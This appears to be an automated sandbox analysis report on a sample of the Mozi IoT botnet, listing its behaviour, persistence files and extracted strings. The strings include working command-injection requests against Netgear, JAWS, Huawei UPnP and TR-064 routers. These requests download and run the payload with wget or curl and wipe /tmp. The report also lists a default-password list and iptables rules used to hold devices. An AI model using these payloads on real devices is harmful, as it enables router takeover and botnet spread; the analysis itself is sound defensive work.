Source: /usr/networks, type: DROPPED	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =

Source: Initial sample	Potential command found: GET /c HTTP/1.0
Source: Initial sample	Potential command found: GET %s HTTP/1.1
Source: Initial sample	Potential command found: GET /c
Source: Initial sample	Potential command found: GET /Mozi.6 HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.7 HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.c HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.m HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.x HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.a HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.s HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.r HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.b HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.4 HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.k HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.l HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.p HTTP/1.0
Source: Initial sample	Potential command found: GET /%s HTTP/1.1
Source: Initial sample	Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: Initial sample	Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: Initial sample	Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
Source: Initial sample	Potential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
Source: Initial sample	Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
Source: Initial sample	Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron

Source: Initial sample	String containing potential weak password found: admin
Source: Initial sample	String containing potential weak password found: default
Source: Initial sample	String containing potential weak password found: support
Source: Initial sample	String containing potential weak password found: service
Source: Initial sample	String containing potential weak password found: supervisor
Source: Initial sample	String containing potential weak password found: guest
Source: Initial sample	String containing potential weak password found: administrator
Source: Initial sample	String containing potential weak password found: 123456
Source: Initial sample	String containing potential weak password found: 54321
Source: Initial sample	String containing potential weak password found: password
Source: Initial sample	String containing potential weak password found: 12345
Source: Initial sample	String containing potential weak password found: admin1234

Source: ELF static info symbol of initial sample

.symtab present: no

Source: Initial sample	String containing 'busybox' found: busybox
Source: Initial sample	String containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
Source: Initial sample	String containing 'busybox' found: /bin/busybox cat /binols\|head -n 1
Source: Initial sample	String containing 'busybox' found: "\x%82xsage:/bin/busybox cat /binols\|head -n 1
Source: Initial sample	String containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
Source: Initial sample	String containing 'busybox' found: /bin/busybox!cat obin/ls\|more
Source: Initial sample	String containing 'busybox' found: dd bs=52 count=1(if=/bin/ls \|\| cat /bin/ls \|\| while read i; do echo $i; done < /bin/ls \|\| while read i; do$echo $i; done < /bin/busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox dd"bs=52 count=1 if=/bin/ls \|\| /bin/busybox cat /bin/ls \|\| while read i; do printf $i; done < /bin/ls \|\| while read i; do printf $i; done < /bin/busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox chmod 777 .i \|\| (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
Source: Initial sample	String containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh \|\|curl -O http://%s:%d/bin.sh \|\|/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh \|\|(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
Source: Initial sample	String containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i \|\| (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample	String containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>

Source: classification engine

Classification label: mal100.spre.troj.evad.lin@0/487@4/0

Persistence and Installation Behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/ZFvtIZszMd (PID: 5251)

File: /etc/rcS.d/S95baby.sh

Jump to behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/profile.d/cedilla-portuguese.sh	Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/profile.d/im-config_wayland.sh	Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/profile.d/gawk.sh	Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/profile.d/01-locale-fix.sh	Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/profile.d/apps-bin-path.sh	Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/profile.d/Z99-cloudinit-warnings.sh	Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/profile.d/vte-2.91.sh	Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/profile.d/Z97-byobu.sh	Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/profile.d/Z99-cloud-locale-test.sh	Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/profile.d/xdg_dirs_desktop_session.sh	Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/profile.d/bash_completion.sh	Jump to behavior

Sample reads /proc/mounts (often used for finding a writable filesystem)

Source: /tmp/ZFvtIZszMd (PID: 5251)

File: /proc/5251/mounts

Jump to behavior

Terminates several processes with shell command 'killall'

Source: /bin/sh (PID: 5255)

Killall command executed: killall -9 telnetd utelnetd scfgmgr

Source: /tmp/ZFvtIZszMd (PID: 5251)

File written: /usr/networks

Jump to dropped file

Source: /tmp/ZFvtIZszMd (PID: 5251)	Shell script file created: /etc/rcS.d/S95baby.sh			Jump to dropped file
Source: /tmp/ZFvtIZszMd (PID: 5251)	Shell script file created: /etc/init.d/S95baby.sh			Jump to dropped file

Source: /tmp/ZFvtIZszMd (PID: 5264)

Reads from proc file: /proc/stat

Jump to behavior

Source: /usr/bin/killall (PID: 5255)	File opened: /proc/5141/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1582/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/3088/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/230/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/110/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/231/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/111/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/232/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1579/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/112/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/233/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1699/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/113/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/234/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1335/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1698/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/114/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/235/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1334/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1576/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/2302/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/115/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/236/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/116/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/237/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/117/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/118/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/910/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/119/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/912/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/10/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/2307/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/11/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/918/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/5030/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/12/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/13/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/14/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/15/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/5155/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/16/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/17/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/18/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1594/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/120/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/5150/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/121/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1349/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/122/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/243/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/123/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/2/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/124/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/3/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/4/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/125/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/126/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1344/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1465/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1586/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/127/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/6/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/248/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/128/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/249/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1463/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/800/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/9/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/801/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/20/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/21/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1900/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/22/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/23/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/24/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/25/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/26/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/27/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/28/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/29/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/491/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/250/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/130/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/251/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/252/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/132/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/253/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/254/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/255/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/256/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1599/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/257/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1477/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/379/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/258/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1476/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/259/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1475/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/936/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/30/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/2208/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/35/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/5177/stat
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/5178/stat

Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /usr/networks (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/ZFvtIZszMd (PID: 5253)	Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
Source: /tmp/ZFvtIZszMd (PID: 5277)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 42337 -j ACCEPT"
Source: /tmp/ZFvtIZszMd (PID: 5284)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 42337 -j ACCEPT"
Source: /tmp/ZFvtIZszMd (PID: 5287)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 42337 -j ACCEPT"
Source: /tmp/ZFvtIZszMd (PID: 5292)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 42337 -j ACCEPT"
Source: /tmp/ZFvtIZszMd (PID: 5295)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 42337 -j ACCEPT"
Source: /tmp/ZFvtIZszMd (PID: 5298)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 42337 -j ACCEPT"
Source: /tmp/ZFvtIZszMd (PID: 5301)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 42337 -j ACCEPT"
Source: /tmp/ZFvtIZszMd (PID: 5304)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 42337 -j ACCEPT"
Source: /tmp/ZFvtIZszMd (PID: 5310)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
Source: /tmp/ZFvtIZszMd (PID: 5313)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
Source: /tmp/ZFvtIZszMd (PID: 5316)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
Source: /tmp/ZFvtIZszMd (PID: 5319)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
Source: /tmp/ZFvtIZszMd (PID: 5322)	Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
Source: /tmp/ZFvtIZszMd (PID: 5324)	Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
Source: /tmp/ZFvtIZszMd (PID: 5326)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
Source: /tmp/ZFvtIZszMd (PID: 5331)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
Source: /tmp/ZFvtIZszMd (PID: 5334)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
Source: /tmp/ZFvtIZszMd (PID: 5337)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
Source: /tmp/ZFvtIZszMd (PID: 5340)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
Source: /tmp/ZFvtIZszMd (PID: 5343)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
Source: /tmp/ZFvtIZszMd (PID: 5346)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
Source: /tmp/ZFvtIZszMd (PID: 5349)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
Source: /tmp/ZFvtIZszMd (PID: 5352)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
Source: /tmp/ZFvtIZszMd (PID: 5355)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
Source: /tmp/ZFvtIZszMd (PID: 5359)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
Source: /tmp/ZFvtIZszMd (PID: 5362)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
Source: /tmp/ZFvtIZszMd (PID: 5398)	Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 15453 -j ACCEPT"
Source: /tmp/ZFvtIZszMd (PID: 5401)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 15453 -j ACCEPT"
Source: /tmp/ZFvtIZszMd (PID: 5404)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 15453 -j ACCEPT"
Source: /tmp/ZFvtIZszMd (PID: 5407)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 15453 -j ACCEPT"
Source: /tmp/ZFvtIZszMd (PID: 5410)	Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 15453 -j ACCEPT"
Source: /tmp/ZFvtIZszMd (PID: 5413)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 15453 -j ACCEPT"
Source: /tmp/ZFvtIZszMd (PID: 5416)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 15453 -j ACCEPT"
Source: /tmp/ZFvtIZszMd (PID: 5419)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 15453 -j ACCEPT"

Source: /usr/bin/dash (PID: 5196)

Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.dvcVrUcqjW /tmp/tmp.b2DlyODsJX /tmp/tmp.FBXdssB42e

Source: submitted sample

Stderr: telnetd: no process foundutelnetd: no process foundscfgmgr: no process foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705/bin/sh: 1: cfgtool: not found/bin/sh: 1: cfgtool: not foundUnsupported ioctl: cmd=0xffffffff80045705qemu: uncaught target signal 4 (Illegal instruction) - core dumpedUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705: exit code = 0

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/init.d/S95baby.sh	Jump to dropped file
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/init.d/keyboard-setup.sh	Jump to dropped file
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/init.d/console-setup.sh	Jump to dropped file
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/init.d/hwclock.sh	Jump to dropped file
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /usr/bin/gettext.sh	Jump to dropped file
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /usr/bin/rescan-scsi-bus.sh	Jump to dropped file

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 52454 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 52454
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 37800 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 7574 -> 37800
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 46902 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 37178 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 8443 -> 37178
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 47424 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 49152 -> 47424

Source: /tmp/ZFvtIZszMd (PID: 5247)	Queries kernel information via 'uname':
Source: /tmp/ZFvtIZszMd (PID: 5251)	Queries kernel information via 'uname':
Source: /tmp/ZFvtIZszMd (PID: 5260)	Queries kernel information via 'uname':

Source: ZFvtIZszMd, 5247.1.00000000cdc52344.000000009e1c7e8b.rw-.sdmp, ZFvtIZszMd, 5249.1.00000000cdc52344.000000009e1c7e8b.rw-.sdmp, ZFvtIZszMd, 5268.1.00000000cdc52344.000000009e1c7e8b.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/ZFvtIZszMdSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/ZFvtIZszMd
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: echo Monitoring qemu job at pid $qemu_pid
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: ( $QEMU $qemu_args -m $TORTURE_QEMU_MEM -kernel $KERNEL -append "$qemu_append $boot_args" > $resdir/qemu-output 2>&1 & echo $! > $resdir/qemu_pid; wait `cat $resdir/qemu_pid`; echo $? > $resdir/qemu-retval ) &
Source: functions.sh2.30.dr	Binary or memory string: qemu-system-ppc64)
Source: kvm.sh.30.dr	Binary or memory string: print "kvm-test-1-run.sh " CONFIGDIR cf[j], builddir, rd cfr[jn], dur " \"" TORTURE_QEMU_ARG "\" \"" TORTURE_BOOTARGS "\" > " rd cfr[jn] "/kvm-test-1-run.sh.out 2>&1 &"
